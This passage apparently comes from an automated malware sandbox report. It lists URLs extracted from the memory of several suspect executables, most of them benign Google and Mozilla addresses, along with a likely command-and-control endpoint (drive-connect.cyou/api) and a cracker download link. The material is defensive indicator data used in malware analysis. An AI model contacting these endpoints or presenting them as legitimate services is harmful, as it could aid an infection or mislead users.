                        Source: dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx)W~
                        Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx/
                        Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx0931
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx0AAD
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx0Tn
                        Source: dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx1
                        Source: AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx1D00
                        Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx1E2A
                        Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx2238
                        Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx2898
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx2E20
                        Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx4AB2
                        Source: dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx5
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx64A4
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx64A4Fy
                        Source: t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666538652.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667253745.000001B3EE926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx7
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx773E
                        Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx965F
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx9E15
                        Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx:
                        Source: t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666538652.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667253745.000001B3EE926000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx;
                        Source: dwVrTdy.exe, 00000026.00000003.269575988391.000002243263A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx=l
                        Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxBCA7
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxC181
                        Source: dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxD
                        Source: AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxD2FF
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxDD68j
                        Source: AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxE2E9
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxEAEC
                        Source: t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxLn
                        Source: dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxQ
                        Source: AzVRM7c.exe, 00000029.00000003.269623076697.00000247ADF0C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxZ
                        Source: dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxam
                        Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxh
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxj
                        Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxl
                        Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxm
                        Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxo
                        Source: dwVrTdy.exe, 00000028.00000003.269592668229.00000256355FC000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxp
                        Source: dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575586601.000002243263F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxumy
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxv
                        Source: t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxxn
                        Source: AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxz
                        Source: AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx~
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.googl
                        Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
                        Source: t5abhIx.exe, 0000002B.00000003.269667407590.000001B3EE927000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/)5
                        Source: dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/3&
                        Source: AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/U
                        Source: dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/f
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/gest
                        Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/icl
                        Source: dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/il
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/omeu_V
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/w
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621997024.00000247ADEBB000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goosm
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.0000000001245000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269665896890.00000000012BF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675473570.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/E
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/L
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/T
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269581333238.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000122D000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269582254227.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269597245823.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269582406764.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269585020635.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269583843534.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269569320585.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269602098460.00000000039E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api
                        Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api#
                        Source: b1dc05533c.exe, 00000014.00000003.269581642475.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269621268757.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269603996511.00000000039CB000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269585250102.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269598023150.00000000039C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api7
                        Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000122D000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api8
                        Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269569320585.00000000039E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apiG
                        Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apiN
                        Source: b1dc05533c.exe, 00000014.00000003.269555366509.00000000012D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apiX
                        Source: b1dc05533c.exe, 00000014.00000003.269621268757.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apib
                        Source: b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apie
                        Source: b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apipJ/
                        Source: b1dc05533c.exe, 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apiy
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/m
                        Source: b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou:443/apiicrosoft
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.g
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                        Source: dwVrTdy.exe, 00000026.00000003.269575949118.000002243262B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.goog
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                        Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593953212.00000256355F5000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.00000256355E6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594381110.00000256355F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
